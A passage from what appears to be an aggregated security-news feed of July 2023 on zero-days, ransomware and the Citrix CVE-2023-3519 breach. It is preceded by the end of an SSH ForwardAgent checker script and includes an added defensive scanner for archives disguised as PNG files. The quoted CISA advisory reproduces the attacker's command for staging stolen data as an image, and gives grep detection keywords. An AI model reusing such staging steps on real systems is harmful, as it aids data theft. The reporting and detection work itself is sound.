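    """Return literal Host entries whose effective ForwardAgent is yes."""
    blocks = parse_blocks(text)
    return [h for h in literal_hosts(blocks)
            if effective(blocks, h, "forwardagent", "no").lower() == "yes"]


if __name__ == "__main__":
    for host in hosts_with_agent_forwarding(SAMPLE_CONFIG):
        print(f"{host}: agent forwarding enabled")
```

Note that `staging.example.net` is reported even though its own block never mentions ForwardAgent: the later `Host *.example.net` block supplies the value, while `ci-runner` falls through to the trailing `Host *` default. Patterns are matched against the name typed on the command line, not against HostName, which is why `bastion` is not affected by the `*.example.net` block.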


                Banking Sector Targeted in Open-Source Software Supply Chain Attacks

                financial
                2023-07-24 https://thehackernews.com/2023/07/banking-sector-targeted-in-open-source.html
                Cybersecurity researchers said they have discovered what they say is the first open-source software supply chain attacks specifically targeting the banking sector. "These attacks showcased advanced techniques, including targeting specific components in web assets of the victim bank by attaching malicious functionalities to it," Checkmarx said in a report published last week. "The attackers

                Autosummary: "Over the past four and a half years, the Russian-speaking group Red Curl [...] has carried out at least 34 attacks on companies from the UK, Germany, Canada, Norway, Ukraine, and Australia," the company said.


                Norwegian government IT systems hacked using zero-day flaw

                exploits government
                2023-07-24 https://www.bleepingcomputer.com/news/security/norwegian-government-it-systems-hacked-using-zero-day-flaw/
                The Norwegian government is warning that its ICT platform used by 12 ministries has suffered a cyberattack after hackers exploited a zero-day vulnerability in third-party software. [...]


                Critical Zero-Days in Atera Windows Installers Expose Users to Privilege Escalation Attacks

                exploits
                2023-07-24 https://thehackernews.com/2023/07/critical-zero-days-in-atera-windows.html
                Zero-day vulnerabilities in Windows Installers for the Atera remote monitoring and management software could act as a springboard to launch privilege escalation attacks. The flaws, discovered by Mandiant on February 28, 2023, have been assigned the identifiers CVE-2023-26077 and CVE-2023-26078, with the issues remediated in versions 1.8.3.7 and 1.8.4.9 released by Atera on April 17, 2023, and

                Autosummary: The flaws, discovered by Mandiant on February 28, 2023, have been assigned the identifiers CVE-2023-26077 and CVE-2023-26078, with the issues remediated in versions 1.8.3.7 and 1.8.4.9 released by Atera on April 17, 2023, and June 26, 2023, respectively.


                Apple fixes new zero-day used in attacks against iPhones, Macs

                exploits
                2023-07-24 https://www.bleepingcomputer.com/news/apple/apple-fixes-new-zero-day-used-in-attacks-against-iphones-macs/
                Apple has released security updates to address zero-day vulnerabilities exploited in attacks targeting iPhones, Macs, and iPads. [...]


                Lazarus hackers hijack Microsoft IIS servers to spread malware

                exploits
                2023-07-24 https://www.bleepingcomputer.com/news/security/lazarus-hackers-hijack-microsoft-iis-servers-to-spread-malware/
                The North Korean state-sponsored Lazarus hacking group is breaching Windows Internet Information Service (IIS) web servers to hijack them for malware distribution. [...]

                Autosummary: Next, Lazarus uses the "JuicyPotato" privilege escalation malware ("usopriv.exe") to gain higher-level access to the compromised system.


                Ivanti patches MobileIron zero-day bug exploited in attacks

                exploits
                2023-07-24 https://www.bleepingcomputer.com/news/security/ivanti-patches-mobileiron-zero-day-bug-exploited-in-attacks/
                US-based IT software company Ivanti has patched an actively exploited zero-day vulnerability impacting its Endpoint Manager Mobile (EPMM) mobile device management software (formerly MobileIron Core). [...]

                Autosummary: They also target unsupported and end-of-life software versions lower than 11.8.1.0 (e.g., 11.7.0.0, 11.5.0.0). While Ivanti has published a security advisory to provide details on the security vulnerability, the information is behind a login, given that the article can only be accessed with an account linked to Ivanti customer information.


                Week in review: VirusTotal data leak, Citrix NetScaler zero-day exploitation

                exploits
                2023-07-23 https://www.helpnetsecurity.com/2023/07/23/week-in-review-virustotal-data-leak-citrix-netscaler-zero-day-exploitation/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Citrix ADC zero-day exploitation: CISA releases details about attack on CI organization (CVE-2023-3519) The exploitation of the Citrix NetScaler ADC zero-day vulnerability (CVE-2023-3519) was first spotted by a critical infrastructure organization, who reported it to the Cybersecurity and Infrastructure Security Agency (CISA). North Korean hackers targeted tech companies through JumpCloud and GitHub North Korean state-sponsored hackers have been linked to … More

                The post Week in review: VirusTotal data leak, Citrix NetScaler zero-day exploitation appeared first on Help Net Security.


                Autosummary: Trends in ransomware-as-a-service and cryptocurrency to monitor: While most cryptocurrency is traceable, many ransomware operators perform their misdeeds from countries with governments who tend to look the other way, especially if the attacks don’t target the country they are operating from. What to do (and what not to do) after a data breach: In this Help Net Security video, Rodman Ramezanian, Global Cloud Threat Lead at Skyhigh Security, discusses what we should do – and not do – in the wake of a data breach. CISOs under pressure: Protecting sensitive information in the age of high employee turnover: In this Help Net Security interview, Charles Brooks, Adjunct Professor at Georgetown University’s Applied Intelligence Program and graduate Cybersecurity Programs, talks about how zero trust principles, identity access management, and managed security services are crucial for effective cybersecurity, and how implementation of new technologies like AI, machine learning, and tracking tools can enhance supply chain security.


                Microsoft enhances Windows 11 Phishing Protection with new features

                financial
                2023-07-23 https://www.bleepingcomputer.com/news/microsoft/microsoft-enhances-windows-11-phishing-protection-with-new-features/
                Microsoft is further enhancing the Windows 11 Enhanced Phishing Protection by testing a new feature that warns users when they copy and paste their Windows password into websites and documents. [...]

                Autosummary: Stolen RDP credentials sold on dark web marketplace
                Due to this widespread abuse, law enforcement has been actively targeting stolen credential marketplaces in law enforcement operations, seizing the WT1SHOP in 2022 and, more recently, taking down the Genesis Market. Even worse, these stolen accounts can be used to access corporate networks, allowing the hackers to spread laterally on a network to conduct BEC scams, data theft, supply chain attacks, and ransomware attacks.


                Windows 11 23H2 getting an energy report with app's power usage

                industry
                2023-07-22 https://www.bleepingcomputer.com/news/microsoft/windows-11-23h2-getting-an-energy-report-with-apps-power-usage/
                Microsoft is making it easier to see how much energy your apps use in Windows 11 over a given period by introducing a detailed power consumption page in the latest 23H2 update. [...]

                Autosummary: Battery usage per app on Windows 11's energy page
                In addition, the page includes a section for "battery usage per app", allowing users to select between “Total usage”, “In use”, “Background”, and “Name”.


                CISOs are making cybersecurity a business problem

                ciber
                2023-07-21 https://www.helpnetsecurity.com/2023/07/21/enterprises-growing-cybersecurity-threats/

                U.S. enterprises are responding to growing cybersecurity threats by working to make the best use of tools and services to ensure business resilience, according to ISG. Enterprises face growing cybersecurity threats The report for the U.S. finds that the U.S. security landscape changed significantly in 2022, with breaches declining in number but increasing in size and the federal government tightening compliance rules. Many organizations began to improve visibility and risk management to better protect themselves … More

                The post CISOs are making cybersecurity a business problem appeared first on Help Net Security.



                Brazil"s Embraer plans to build electric flying taxi factory near Sao Paolo

                latam industry
                2023-07-21 https://www.bbc.co.uk/news/world-latin-america-66264229?at_medium=RSS&at_campaign=KARANGA
                Embraer says it will build electric aircraft with hopes they will take flight from 2026.


                Attackers intensify DDoS attacks with new tactics

                industry
                2023-07-21 https://www.helpnetsecurity.com/2023/07/21/ddos-attacks-h1-2023/

                As we entered 2023, the cybersecurity landscape witnessed an increase in sophisticated, high-volume attacks, according to Gcore. The maximum attack power rose from 600 to 800 Gbps. UDP flood attacks were most common and amounted to 52% of total attacks, while SYN flood accounted for 24%. In third place was TCP flood. The most-attacked business sectors are gaming, telecom, and financial. The longest attack duration in Q2/Q3 was seven days, 16 hours, and 22 minutes. … More

                The post Attackers intensify DDoS attacks with new tactics appeared first on Help Net Security.


                Autosummary: The increase in DDoS attack volume in H1 2023: There has been a significant increase in the power and volume of DDoS attacks over the last two years. In 2021, the capacity of DDoS attacks was up to 300 Gbps.


                Citrix ADC zero-day exploitation: CISA releases details about attack on CI organization (CVE-2023-3519)

                exploits
                2023-07-21 https://www.helpnetsecurity.com/2023/07/21/cve-2023-3519-exploitation/

                The exploitation of the Citrix NetScaler ADC zero-day vulnerability (CVE-2023-3519) was first spotted by a critical infrastructure organization, who reported it to the Cybersecurity and Infrastructure Security Agency (CISA). “In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell on a critical infrastructure organization’s non-production environment NetScaler ADC appliance. The webshell enabled the actors to perform discovery on the victim’s active directory (AD) and collect and exfiltrate AD data. The … More

                The post Citrix ADC zero-day exploitation: CISA releases details about attack on CI organization (CVE-2023-3519) appeared first on Help Net Security.


                Autosummary: In-the-wild exploitation of CVE-2023-3519: GreyNoise has created a tag to show in-the-wild probing of internet-facing NetScaler ADC platforms and Gateways with authentication attempts through CVE-2023-3519, but so far there have been no detections.


                CISA: Citrix RCE bug exploited to breach critical infrastructure org

                exploits
                2023-07-21 https://www.bleepingcomputer.com/news/security/cisa-citrix-rce-bug-exploited-to-breach-critical-infrastructure-org/
                Threat actors have breached the network of a U.S. organization in the critical infrastructure sector after exploiting a zero-day RCE vulnerability currently identified as CVE-2023-3519, a critical-severity issue in NetScaler ADC and Gateway that Citrix patched this week. [...]

                Autosummary: They did SMB scanning on the subnet and used the webshell to check and exfiltrate Active Directory inventory, with a particular interest in:
                NetScaler configuration files that contain an encrypted password whose key is on the ADC appliance
                NetScaler decryption keys, which can unlock the AD password in the configuration file
                The list of users, systems, groups, subnets, organizational units, contacts, partitions, and trusts in the Active Directory
                The attacker encrypted the discovery data using the OpenSSL library and readied it for exfiltration to a web-accessible location in compressed form as a tarball disguised as a PNG image. The backdoor enabled the attacker to discover active directory (AD) objects, which include users, groups, applications, and devices on the network, as well as steal AD data.


                Sophisticated BundleBot Malware Disguised as Google AI Chatbot and Utilities

                exploits
                2023-07-21 https://thehackernews.com/2023/07/sophisticated-bundlebot-malware.html
                A new malware strain known as BundleBot has been stealthily operating under the radar by taking advantage of .NET single-file deployment techniques, enabling threat actors to capture sensitive information from compromised hosts. "BundleBot is abusing the dotnet bundle (single-file), self-contained format that results in very low or no static detection at all," Check Point said in a report

                Autosummary: The archive file, when unpacked, contains an executable file ("GoogleAI.exe"), which is the .NET single-file, self-contained application that, in turn, incorporates a DLL file ("GoogleAI.dll"), whose responsibility is to fetch a password-protected ZIP archive from Google Drive.


                Local Governments Targeted for Ransomware – How to Prevent Falling Victim

                exploits government ransomware
                2023-07-21 https://thehackernews.com/2023/07/local-governments-targeted-for.html
                Regardless of the country, local government is essential in most citizens' lives. It provides many day-to-day services and handles various issues. Therefore, their effects can be far-reaching and deeply felt when security failures occur. In early 2023, Oakland, California, fell victim to a ransomware attack. Although city officials have not disclosed how the attack occurred, experts suspect a

                Autosummary: In addition to several offices closing, many services remained offline for some time, including Oak311, Parking Citation Assistance Center, Business Tax Licenses, and Permitting. As most local governments maintain a small IT staff, there is potential for shared passwords, reused credentials, and a lack of multi-factor authentication security, exposing vulnerabilities for a breach.


                Netscaler ADC bug exploited to breach US critical infrastructure org

                exploits
                2023-07-21 https://www.bleepingcomputer.com/news/security/netscaler-adc-bug-exploited-to-breach-us-critical-infrastructure-org/
                The US government is warning that threat actors breached the network of a U.S. organization in the critical infrastructure sector after exploiting a zero-day RCE vulnerability currently identified as CVE-2023-3519, a critical-severity issue in NetScaler ADC and Gateway that Citrix patched this week. [...]

                Autosummary: They did SMB scanning on the subnet and used the webshell to check and exfiltrate Active Directory inventory, with a particular interest in:
                NetScaler configuration files that contain an encrypted password whose key is on the ADC appliance
                NetScaler decryption keys, which can unlock the AD password in the configuration file
                The list of users, systems, groups, subnets, organizational units, contacts, partitions, and trusts in the Active Directory
                The attacker encrypted the discovery data using the OpenSSL library and readied it for exfiltration to a web-accessible location in compressed form as a tarball disguised as a PNG image. The backdoor enabled the attacker to enumerate active directory (AD) objects, which include users, groups, applications, and devices on the network, as well as steal AD data.
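Both NetScaler entries above (the CISA one and this one) describe the same staging step: the AD discovery output was compressed into a tarball, renamed to look like a PNG image and parked in a web-accessible directory. That is a mismatch a responder can check for on disk without any appliance-specific knowledge. The example below is added here and is not CISA's, Citrix's or the attacker's code: it walks a directory, reads the first 512 bytes of every image-named file and compares them against the standard PNG, JPEG, GIF, gzip, zip and POSIX tar magic values, reporting image names that actually hold an archive. The directory it scans is built inline from constructed files so the check runs offline; on a real appliance you would point `scan()` at the web root instead.

```python
"""Find image-named files whose bytes are really an archive.

Added example (not from CISA or Citrix). Magic values are the standard ones
for each format; the directory it scans is constructed inline.
"""
import gzip
import io
import os
import tarfile
import tempfile

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
IMAGE_EXT = {".png", ".jpg", ".jpeg", ".gif"}
ARCHIVE_TYPES = {"gzip", "zip", "tar"}


def classify(header):
    """Identify a file from its first bytes; pass at least 512 bytes so the tar check works."""
    if header.startswith(PNG_MAGIC):
        return "png"
    if header[:3] == b"\xff\xd8\xff":
        return "jpeg"
    if header[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    if header[:2] == b"\x1f\x8b":
        return "gzip"
    if header[:4] == b"PK\x03\x04":
        return "zip"
    if header[257:262] == b"ustar":  # POSIX/GNU tar magic lives at offset 257
        return "tar"
    return "unknown"


def scan(root):
    """Return sorted (relative_path, extension, actual_type) for image-named archives under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if ext not in IMAGE_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                header = fh.read(512)
            actual = classify(header)
            if actual in ARCHIVE_TYPES:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, ext, actual))
    return sorted(findings)


def build_demo_tree():
    """Create a temp dir holding a genuine PNG, a gzip renamed .png and a tar renamed .png."""
    root = tempfile.mkdtemp(prefix="png_scan_")
    with open(os.path.join(root, "logo.png"), "wb") as fh:
        fh.write(PNG_MAGIC + b"\x00" * 32)  # constructed: real PNG header, junk body
    with open(os.path.join(root, "a.png"), "wb") as fh:
        fh.write(gzip.compress(b"constructed exfil data"))
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        payload = b"constructed AD dump"
        info = tarfile.TarInfo("ad_dump.txt")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    os.makedirs(os.path.join(root, "static"))
    with open(os.path.join(root, "static", "b.png"), "wb") as fh:
        fh.write(buf.getvalue())
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for rel, ext, actual in scan(demo):
        print(f"{rel}: named {ext} but contains {actual}")
```

Only the header is read, so the scan is cheap enough to run over an entire web root; an encrypted blob (the advisory says the data was encrypted with OpenSSL before staging) would come back as `unknown` rather than as an archive, so treat any image-named file that is not a recognised image as worth a second look, not just the ones this flags.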


                HotRat: New Variant of AsyncRAT Malware Spreading Through Pirated Software

                exploits
                2023-07-21 https://thehackernews.com/2023/07/hotrat-new-variant-of-asyncrat-malware.html
                A new variant of AsyncRAT malware dubbed HotRat is being distributed via free, pirated versions of popular software and utilities such as video games, image and sound editing software, and Microsoft Office. "HotRat malware equips attackers with a wide array of capabilities, such as stealing login credentials, cryptocurrency wallets, screen capturing, keylogging, installing more malware, and



                The Week in Ransomware - July 21st 2023 - Avaddon Back as NoEscape

                exploits ransomware
                2023-07-21 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-july-21st-2023-avaddon-back-as-noescape/
                This edition of the Week in Ransomware covers the last two weeks of news, as we could not cover it last week, and includes quite a bit of new information, including the return of the Avaddon ransomware gang. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @demonslay335, @Seifreed, @BleepinComputer, @malwrhunterteam, @billtoulas, @Ionut_Ilascu, @struppigel, @fwosar, @LawrenceAbrams, @serghei, @chainalysis, @TrendMicro, @Intel_by_KELA, @pcrisk, @SophosXOps, @coveware, @BroadcomSW, @pcrisk, and @azalsecurity. In other ransomware reports from BleepingComputer and cybersecurity firms: Finally, Clop's data theft attacks using the MOVEit Transfer zero-day continue to be a hot topic in the news, with companies continuing to disclose data breaches as they are added to the gang's data leak site.


                CISA: You've got two weeks to patch Citrix NetScaler vulnerability CVE-2023-3519

                exploits
                2023-07-21 https://www.malwarebytes.com/blog/news/2023/07/citrix-netscaler-vulnerability-added-to-known-to-be-exploited-catalog


                A critical unauthenticated remote code execution vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway is being actively exploited


                The post CISA: You've got two weeks to patch Citrix NetScaler vulnerability CVE-2023-3519 appeared first on Malwarebytes Labs.


                Autosummary: The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities: NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13; NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13; NetScaler ADC 13.1-FIPS before 13.1-37.159; NetScaler ADC 12.1-FIPS before 12.1-55.297; NetScaler ADC 12.1-NDcPP before 12.1-55.297. Citrix notes that NetScaler ADC and NetScaler Gateway version 12.1 have reached the end-of-life stage and customers should upgrade to a newer variant of the product.


                Estée Lauder targeted by Cl0p and BlackCat ransomware groups

                exploits ransomware
                2023-07-21 https://www.malwarebytes.com/blog/news/2023/07/este-lauder-targeted-by-cl0p-and-blackcat-ransomware-groups


                We take a look at reports of cosmetics firm Estée Lauder being attacked by the Cl0p and BlackCat ransomware groups.


                The post Estée Lauder targeted by Cl0p and BlackCat ransomware groups appeared first on Malwarebytes Labs.


                Autosummary: Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Regular readers will know that these attacks typically target confidential information, company secrets, personal data, payroll, and identity scans. Supposedly, the information taken could “impact customers, employees, and suppliers”.


                Why data travel is healthcare’s next big cybersecurity challenge

                ciber
                2023-07-20 https://www.helpnetsecurity.com/2023/07/20/healthcare-data-travel-cybersecurity-challenge/

                Do you know where your patients’ data lives once it’s in the cloud? Unfortunately, for many healthcare organizations, the answer is no – or, at least, it’s not a definitive yes. Knowing how (or where) data is used, shared or stored is essential to ensuring organizational security and patient privacy. Yet, as digital transformation makes data more “liquid”, it’s becoming a larger challenge. Here’s why data travel is the next big cybersecurity challenge — and … More

                The post Why data travel is healthcare’s next big cybersecurity challenge appeared first on Help Net Security.


                Autosummary: Strategies for managing data travel: Here are a few of the most important strategies organizations can utilize to effectively manage and monitor data travel. Data mapping: To gain a comprehensive view of how data moves within and outside your organization, data mapping is key. Encryption: Encrypting your data, whether it’s in transit or at rest, provides an additional layer of security, ensuring that even if data falls into the wrong hands, it remains unreadable without the correct decryption key.


                A fresh look at the current state of financial fraud

                financial government
                2023-07-20 https://www.helpnetsecurity.com/2023/07/20/current-state-financial-fraud-video/

                In this Help Net Security video, Greg Woolf, CEO at FiVerity, discusses how the emergence of sophisticated fraud tools powered by AI and recent upheavals in the banking sector have forged an ideal environment for financial fraud. This complex scenario presents considerable obstacles for financial establishments to defend themselves efficiently. In light of this, key industry participants such as financial bodies, data providers, and governmental entities have identified a collaborative approach as the best defense … More

                The post A fresh look at the current state of financial fraud appeared first on Help Net Security.




                Microsoft Expands Cloud Logging to Counter Rising Nation-State Cyber Threats

                government
                2023-07-20 https://thehackernews.com/2023/07/microsoft-expands-cloud-logging-to.html
                Microsoft on Wednesday announced that it's expanding cloud logging capabilities to help organizations investigate cybersecurity incidents and gain more visibility after facing criticism in the wake of a recent espionage attack campaign aimed at its email infrastructure. The tech giant said it's making the change in direct response to the increasing frequency and evolution of nation-state cyber

                Autosummary: "Over the coming months, we will include access to wider cloud security logs for our worldwide customers at no additional cost," Vasu Jakkal, corporate vice president of security, compliance, identity, and management at Microsoft, said.


                Adobe Rolls Out New Patches for Actively Exploited ColdFusion Vulnerability

                exploits
                2023-07-20 https://thehackernews.com/2023/07/adobe-rolls-out-new-patches-for.html
                Adobe has released a fresh round of updates to address an incomplete fix for a recently disclosed ColdFusion flaw that has come under active exploitation in the wild. The critical shortcoming, tracked as CVE-2023-38205 (CVSS score: 7.5), has been described as an instance of improper access control that could result in a security bypass. It impacts the following versions: ColdFusion 2023 (Update



                Adobe out-of-band update addresses an actively exploited ColdFusion zero-day

                exploits
                2023-07-20 https://securityaffairs.com/148625/hacking/coldfusion-zero-day.html

                Adobe released an emergency update to address critical vulnerabilities in ColdFusion, including an actively exploited zero-day. Adobe released an out-of-band update to address critical and moderate vulnerabilities in ColdFusion, including a zero-day flaw that is actively exploited in attacks.  The vulnerabilities could lead to arbitrary code execution and security feature bypass. The impacted ColdFusion versions are 2023, 2021 […]

                The post Adobe out-of-band update addresses an actively exploited ColdFusion zero-day appeared first on Security Affairs.


                Autosummary: Below is the list of the issues addressed by the software firm with this out-of-band update: Vulnerability Category: Deserialization of Untrusted Data (CWE-502); Vulnerability Impact: Arbitrary code execution; Severity: Critical; CVSS base score: 9.8; CVSS vector: CVSS:3.1/AV:N/AC:


                Common TTPs of attacks against industrial organizations. Implants for remote access

                industry
                2023-07-20 https://ics-cert.kaspersky.com/publications/common-ttps-of-attacks-against-industrial-organizations-implants-for-remote-access/
                In this article (which is the first part of the report) we analyze common TTPs of implants used by threat actors to establish a persistent remote access channel into the infrastructure of industrial organizations.

                Autosummary: IoC sections: Win32.MeatBall; Implant using Yandex Cloud as C2; Variants of FourteenHi. Appendix II – MITRE ATT&CK Mapping: The table below contains all the TTPs identified in the analysis of the activity described in this report. Backdoor. They accept a relatively long list of commands, including: upload arbitrary files, download arbitrary files, run arbitrary commands, set communication delay, start reverse shell, terminate own process and remove persistence. Strings found in a sample which uses Yandex Disk. Log containing the result of command execution using cmd. Conclusion: The tendency to abuse cloud services (e.g., Dropbox, Yandex, Google, etc.) is not new, but it continues to expand, because it is hard to restrict / mitigate in cases when an organization’s business processes depend on using such services. The entire stack of implants used in attacks can be divided into three categories based on their roles: first-stage implants for persistent remote access and initial data gathering; second-stage implants for gathering data and files, including from air-gapped systems; third-stage implants and tools used to upload data to C2. In this article (which is the first part of the report) we analyze common TTPs of first-stage implants used by threat actors to establish a persistent remote access channel into the infrastructure of industrial organizations. Collected data: computer name, user name, IP address, MAC address, OS version, path to %System%. To upload the data collected to C2, the implant sends a request using an embedded API token to create a directory with a name that is unique to the victim host.


                JumpCloud breach traced back to North Korean state hackers

                government
                2023-07-20 https://www.bleepingcomputer.com/news/security/jumpcloud-breach-traced-back-to-north-korean-state-hackers/
                US-based enterprise software company JumpCloud was breached by North Korean Lazarus Group hackers, according to security researchers at SentinelOne and CrowdStrike. [...]

                Autosummary: This hacking group has been active for over a decade, since at least 2009, and is known for attacks against high-profile targets worldwide, including banks, government agencies, and media organizations.


                New P2PInfect worm malware targets Linux and Windows Redis servers

                exploits
                2023-07-20 https://www.bleepingcomputer.com/news/security/new-p2pinfect-worm-malware-targets-linux-and-windows-redis-servers/
                Earlier this month, security researchers discovered a new peer-to-peer (P2P) malware with self-spreading capabilities that targets Redis instances running on Internet-exposed Windows and Linux systems. [...]

                Autosummary: For instance, CVE-2022-0543 exploits have been used for initial access by other botnets targeting Redis instances, including Muhstik and Redigo, for various malicious purposes, including DDoS and brute-forcing attacks.


                Tech support scammers trick victims into old-school offline money transfer

                financial
                2023-07-20 https://www.tripwire.com/state-of-security/tech-support-scammers-trick-victims-old-school-offline-money-transfer
                The FBI warns that tech support scammers are increasingly telling their victims to send actual cash, concealed in newspaper or a magazine, rather than wiring funds. But why? Read more in my article on the Tripwire State of Security blog.

                Autosummary: We're all familiar with tech support scams - where the unwary are tricked into granting remote access to their computers by fraudsters, in the belief that the "tech support person" will fix a non-existent "problem" (such as a "virus infection") or make a refund after claiming that there has been fraudulent activity detected on an account.


                Impinj M800 series RAIN RFID tag chips advance item connectivity for enterprise IoT deployments

                industry
                2023-07-20 https://www.helpnetsecurity.com/2023/07/20/impinj-m800-series-rain-rfid-tag-chips/

                Impinj released the Impinj M800 series RAIN RFID tag chips to meet enterprise needs for item connectivity in global IoT deployments. The new M800 series delivers readability in enterprise deployments and offers enhanced tag reliability and manufacturability. The new chips demonstrate Impinj’s ongoing commitment to increase the speed, distance, and reliability at which a RAIN RFID system can discover, engage, and protect connected items. “Today, we have taken another big step toward our mission to … More

                The post Impinj M800 series RAIN RFID tag chips advance item connectivity for enterprise IoT deployments appeared first on Help Net Security.


                Autosummary: Improving tag readability, reliability, and manufacturability: The Impinj M800 series, comprising the M830 and M850 tag chips, sets new performance benchmarks while improving features of the Impinj M700 series: Improved tag readability.


                Critical AMI MegaRAC bugs can let hackers brick vulnerable servers

                exploits
                2023-07-20 https://www.bleepingcomputer.com/news/security/critical-ami-megarac-bugs-can-let-hackers-brick-vulnerable-servers/
                Two new critical severity vulnerabilities have been discovered in the MegaRAC Baseboard Management Controller (BMC) software made by hardware and software company American Megatrends International. [...]

                Autosummary: Affected vendors include the likes of AMD, Asus, ARM, Dell EMC, Gigabyte, Lenovo, Nvidia, Qualcomm, Hewlett-Packard Enterprise, Huawei, Ampere Computing, ASRock, and more.


                Estée Lauder – internal data stolen after being hit by two separate ransomware attacks

                exploits ransomware
                2023-07-20 https://www.bitdefender.com/blog/hotforsecurity/estee-lauder-internal-data-stolen-after-being-hit-by-two-separate-ransomware-attacks/
                If you thought hackers might be causing your company a few headaches, pity the folks at Estée Lauder. Two different ransomware groups have listed the cosmetics maker on their leak sites on the dark web, as a result of seemingly separate attacks. Read more in my article on the Hot for Security blog.



                Mallox Ransomware Exploits Weak MS-SQL Servers to Breach Networks

                exploits ransomware
                2023-07-20 https://thehackernews.com/2023/07/mallox-ransomware-exploits-weak-ms-sql.html
                Mallox ransomware activities in 2023 have witnessed a 174% increase when compared to the previous year, new findings from Palo Alto Networks Unit 42 reveal. "Mallox ransomware, like many other ransomware threat actors, follows the double extortion trend: stealing data before encrypting an organization's files, and then threatening to publish the stolen data on a leak site as leverage to convince

                Autosummary: The binary, for its part, attempts to stop and remove SQL-related services, delete volume shadow copies, clear system event logs, terminate security-related processes, and bypass Raccine, an open-source tool designed to counter ransomware attacks, prior to commencing its encryption process, after which a ransom note is dropped in every directory.


                North Korean State-Sponsored Hackers Suspected in JumpCloud Supply Chain Attack

                government
                2023-07-20 https://thehackernews.com/2023/07/north-korean-state-sponsored-hackers.html
                An analysis of the indicators of compromise (IoCs) associated with the JumpCloud hack has uncovered evidence pointing to the involvement of North Korean state-sponsored groups, in a style that's reminiscent of the supply chain attack targeting 3CX. The findings come from SentinelOne, which mapped out the infrastructure pertaining to the intrusion to uncover underlying patterns. It's worth noting

                Autosummary: SentinelOne, in its latest analysis, said 144.217.92[.]197, an IP address linked to the JumpCloud attack, resolves to npmaudit[.]com, one of the eight domains listed by GitHub as used to fetch the second-stage malware.


                ALPHV/BlackCat and Clop gangs claim to have hacked cosmetics giant Estée Lauder

                industry
                2023-07-20 https://securityaffairs.com/148651/hacking/alphv-blackcat-clop-estee-lauder.html

                The American cosmetics giant company Estée Lauder was hacked by two distinct ransomware groups, the ALPHV/BlackCat and Clop gangs. Yesterday the cybersecurity expert @sonoclaudio first alerted me about a strange circumstance, two ransomware actors, ALPHV/BlackCat and Clop, claim to have hacked the cosmetics giant company Estée Lauder and added the company to their Tor leak […]

                The post ALPHV/BlackCat and Clop gangs claim to have hacked cosmetics giant Estée Lauder appeared first on Security Affairs.


                Autosummary: Even if the company did not share details about the attack, it is likely that the Clop ransomware group has breached its network by exploiting the MOVEit Transfer zero-day vulnerability.


                Argentina: Woman miraculously misses serious injury in two-car crash

                latam
                2023-07-20 https://www.bbc.co.uk/news/world-latin-america-66262083?at_medium=RSS&at_campaign=KARANGA
                The pedestrian was caught between two cars that collided before careening away in opposite directions.



                Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells

                exploits
                2023-07-20 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a

                SUMMARY

                The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to warn network defenders about exploitation of CVE-2023-3519, an unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway. In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell on a critical infrastructure organization’s non-production environment NetScaler ADC appliance. The webshell enabled the actors to perform discovery on the victim’s active directory (AD) and collect and exfiltrate AD data. The actors attempted to move laterally to a domain controller but network-segmentation controls for the appliance blocked movement.

                The victim organization identified the compromise and reported the activity to CISA and Citrix. Citrix released a patch for this vulnerability on July 18, 2023.

                This advisory provides tactics, techniques, and procedures (TTPs) and detection methods shared with CISA by the victim. CISA encourages critical infrastructure organizations to use the detection guidance included in this advisory for help with determining system compromise. If potential compromise is detected, organizations should apply the incident response recommendations provided in this CSA. If no compromise is detected, organizations should immediately apply patches provided by Citrix.


                TECHNICAL DETAILS

                Note: This advisory uses the

                Autosummary: Citrix released a patch on July 18, 2023.[1] CVE-2023-3519 is an unauthenticated RCE vulnerability affecting the following versions of NetScaler ADC and NetScaler Gateway:[1] NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13; NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13; NetScaler ADC and NetScaler Gateway version 12.1, now end of life; NetScaler ADC 13.1-FIPS before 13.1-37.159; NetScaler ADC 12.1-FIPS before 12.1-65.36; NetScaler ADC 12.1-NDcPP before 12.65.36. The affected appliance must be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or authentication, authorization, and auditing (AAA) virtual server for exploitation.[1] CISA added CVE-2023-3519 to its Known Exploited Vulnerabilities Catalog on July 19, 2023. Overview: In July 2023, a critical infrastructure organization reported to CISA that threat actors may have exploited a zero-day vulnerability in NetScaler ADC to implant a webshell on their non-production NetScaler ADC appliance. The threat actors exfiltrated collected data by uploading it as an image file [T1036.008] to a web-accessible path [T1074]: cp /var/tmp/test.tar.gz /netscaler/ns_gui/vpn/medialogininit.png . The actors deleted the authorization configuration file ( /etc/auth.conf ), likely to prevent configured users (e.g., admin) from logging in remotely (e.g., CLI). Detection guidance: Review NetScaler ADC internal logs ( sh.log* , bash.log* ) for traces of potential malicious activity (some example keywords for grep are provided below): database.php, ns_gui/vpn, /flash/nsconfig/keys/updated, LDAPTLS_REQCERT, ldapsearch, openssl + salt. Review NetScaler ADC internal access logs ( httpaccess-vpn.log* ) for 200 successful access of unknown web resources. Check http error logs for abnormalities that may be from initial exploit: grep "\.sh" /var/log/httperror.log* ; grep 